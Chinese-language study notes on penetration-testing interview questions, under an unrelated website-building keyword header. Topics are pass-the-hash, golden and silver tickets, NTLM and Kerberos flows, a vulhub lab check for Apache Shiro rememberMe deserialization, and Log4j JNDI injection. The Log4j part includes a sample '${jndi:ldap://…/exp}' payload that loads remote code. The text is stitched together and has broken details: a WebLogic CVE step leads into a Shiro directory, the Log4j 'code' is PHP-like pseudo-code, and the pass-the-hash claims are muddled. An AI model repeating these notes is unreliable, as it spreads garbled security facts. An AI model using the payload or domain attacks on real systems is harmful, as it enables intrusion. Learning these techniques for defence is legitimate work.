石家庄模板建站平台,创建网页的三种方法,局域网安装wordpress,网站建设的目的定位盈利模式和功能文章目录 1、熟悉哪些域渗透的手段2、详细说明哈希传递的攻击原理NTLM认证流程哈希传递 3、聊一下黄金票据和白银票据4、shiro反序列化漏洞的形成原因#xff0c;尝试使用burp抓包查看返回包内容安装环境漏洞验证 5、log4j组件的命令执行漏洞是如何造成的6、画图描述Kerberos协… 文章目录 1、熟悉哪些域渗透的手段2、详细说明哈希传递的攻击原理NTLM认证流程哈希传递 3、聊一下黄金票据和白银票据4、shiro反序列化漏洞的形成原因尝试使用burp抓包查看返回包内容安装环境漏洞验证 5、log4j组件的命令执行漏洞是如何造成的6、画图描述Kerberos协议的通信流程并解释如何实现安全的传输 1、熟悉哪些域渗透的手段
黄金票据、白银票据、哈希传递
2、详细说明哈希传递的攻击原理
哈希传递只针对相同密码进行攻击。
NTLM认证流程
NTLM加密 admin - hex(16进制编码) 61646d696e61646d696e- Unicode 610064006d0069006e00610064006d0069006e00–MD4209c6174da490caeb422f3fa5a7ae634 认证过程 注意:challenge每次认证都不一样是一个随机生成的16字节随机数response的形势与server生成的net-ntlm hash一个格式 如上图客户端client发送一个user用户名给服务器server服务器从内存中检查它的用户名user是否存在不存在登录失败存在就生成一个challenge然后服务器会查找内存中user对应的已经NTLM加密后的哈希密文加密的是user的密码假设是admin并使用该哈希加密challenge与challenge做逻辑运算这个加密后的challenge就叫做net-ntlm hash作为密码已经加密的标志保存到服务器内存中
然后服务器会将challenge发送给客户端客户端将自己的密码转换成NTLM哈希用生成的哈希加密challenge这个加密后的challenge叫做response然后客户端将response发送给服务器。
最后服务器对比自己内存中的net-ntlm hash与客户端发来的response是否一致如果一致就登录成功。
在这个过程中即使response被攻击者捕获也不能被伪造保证了通信的安全。
哈希传递 当攻击者知道一台计算机的本地管理员的NTLM哈希那么他可以使用这个哈希轻松地对该计算机进行身份验证。类似地如果他拥有主机上本地管理组成员的域用户的NT哈希他也可以作为本地管理员向该主机进行身份验证。 如下图域中一台计算机沦陷因为其他工作站都具有相同的管理员帐户和相同的密码那么它们也将具有相同的NT哈希攻击者就能用它的NTML哈希验证其他的服务器 3、聊一下黄金票据和白银票据
黄金票据是伪造的TGT,白银票据就是伪造的ST。黄金票据是伪造了域管理员身份票据的TGT白银票据伪造的是服务的票据ST黄金票据可以访问它身份下的所有服务白银票据只能访问被伪造服务票据ST的服务。
4、shiro反序列化漏洞的形成原因尝试使用burp抓包查看返回包内容
形成原因
Apache Shiro框架提供了记住我的功能RememberMe用户登陆成功后会生成经过加密并编码的cookie在服务端接收cookie值后Base64解码–AES解密–反序列化。攻击者只要找到AES加密的密钥就可以构造一个恶意对象对其进行序列化–AES加密–Base64编码然后将其作为cookie的rememberMe字段发送Shiro将rememberMe进行解密并且反序列化最终造成反序列化漏洞。
安装环境
进入vulhb目录下的weblogic复现CVE-2018-2894漏洞
cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件
cat docker-compose.yml如图里面有一个镜像文件的信息和服务名以及它的端口号后面要用 然后使用下面命令搭建docker-compose并启动
sudo docker-compose up -d sudo docker-compose up -d如图安装成功 漏洞验证
原理如下 Apache Shiro框架提供了记住我的功能RememberMe用户登陆成功后会生成经过加密并编码的cookie在服务端接收cookie值后Base64解码–AES解密–反序列化。攻击者只要找到AES加密的密钥就可以构造一个恶意对象对其进行序列化–AES加密–Base64编码然后将其作为cookie的rememberMe字段发送Shiro将rememberMe进行解密并且反序列化最终造成反序列化漏洞。 用bp自带的浏览器打开http://10.9.75.45:8080/随意输入用户名密码并勾选记住我 点击登录后抓包发送到repeat模块发现请求包中有rememberme字段 点击send发送响应包中有set-cookie字段并有rememberMedeleteMe内容这是一个shiro反序列化漏洞的强特征说明有极大的可能存在shiro反序列化 5、log4j组件的命令执行漏洞是如何造成的 log4jlog for Java是Apache的一个开源项目是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中未对字符合法性进行严格的限制执行了JNDI协议加载的远程恶意脚本从而造成RCE。 它是一个RCE命令执行的漏洞,它的日志的输出如下print函数双引号中的内容会被当做字符处理
$user$_GET(user);
log.print(“用户$user登录失败”);如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容就会将大括号中的内容当做命令执行
如果流量中遇到下面三个关键字极大可能是Java的漏洞攻击 rmi、jndi、ldap 6、画图描述Kerberos协议的通信流程并解释如何实现安全的传输 DCDomain Controller域控制器是域中一台拥有最高管理权限的计算机 ADActive Directory活动目录数据库 KDCKey Distributed Centre包含了AS和TGS。 ASAuthentication Server身份验证服务为客户生成TGT的服务 TGSTicket GrantingServer票证发放服务器通过你的TGT来发放ST TGTTicket Granting Ticket票据授权票据通过票据授权票据可以获得一个票据类似临时凭证 STService Ticket服务票据 如下图客户端首先向AS发送请求AS提供TGT身份票据给客户端客户端得到TGT后去访问TGS由TGS发放服务票据ST最后客户端用ST去访问服务端服务端给客户端回应 详解 1、客户端发送自己的用户名给AS 2、AS验证用户名是否在白名单列表如果在的话随机生成session key(as)返回如下信息 TGT1(session key(as),TGS服务器信息等)–客户端NTLM哈希加密 TGT2(session key(as),客户端信息等)–KRBTGT NTLM哈希加密KRBTGT可以理解为DC中最高权限的用户 3、用自己的NTLM哈希解密TGT1 获得TGS服务器信息以及session key(as)TGT2由于是别人的哈希所以解不开。 生成认证因子(客户端信息当前时间)–session key(as)加密认证因子用来验证TGT是否正确 发送认证因子以及TGT2给TGS服务 4、TGS服务先解密TGT2获得session key(as)紧接着利用session key(as)解密认证因子对比认证因子与TGT2的客户端信息是否一致如果一致生成session key(TGS)返回如下信息给客户端 TGT3(session key(TGS),服务器信息票据到期时间)–session key(as)加密 TGT4(session key(TGS),客户端信息票据到期时间)–客户端想要访问的服务器的哈希加密 5、客户端解密TGT3得到session key(TGS)服务器信息 生成认证因子2(服务器信息票据到期时间)–session key(TGS)加密 发送认证因子2以及TGT4给服务器 6、服务器先用自己的哈希解密TGT4得到session key(TGS)客户端信息票据有效期 利用session key(TGS)解密认证因子对比客户端信息验证ST是否正确决定是否提供服务 以下图的邮件服务为例
客户端向域控DC中的AS发送请求AS生成一个session key身份令牌session keyas分别保存在TGT1和TGT2两个身份票据做临时凭证中其中TGT1用客户端的哈希加密TGT2用最高管理用户的哈希加密AS将session keyas发给客户端客户端用自己的NTLM哈希解密TGT1得到TGS服务器信息TGT2无法被客户端解密然后用session keyas加密生成一个认证因子作为TGT2的证明。
然后客户端将认证因子以及TGT2发给TGS服务TGS解密TGT2得到session keyas解密认证因子并与认证因子做对比如果一致则生成session key(TGS)返回TGT3和TGT4给客户端TG3被session key(as)加密由于之前客户端接收到了session keyas所以可以解密TGT3得到服务器信息解密后客户端再次生成一个认证因子作为TGT4的证明。
最后客户端将认证因子及TGT4发送给邮件服务邮件服务用哈希解密TGT4得到session key(TGS)用它解密认证因子对比客户端信息正确则提供服务。
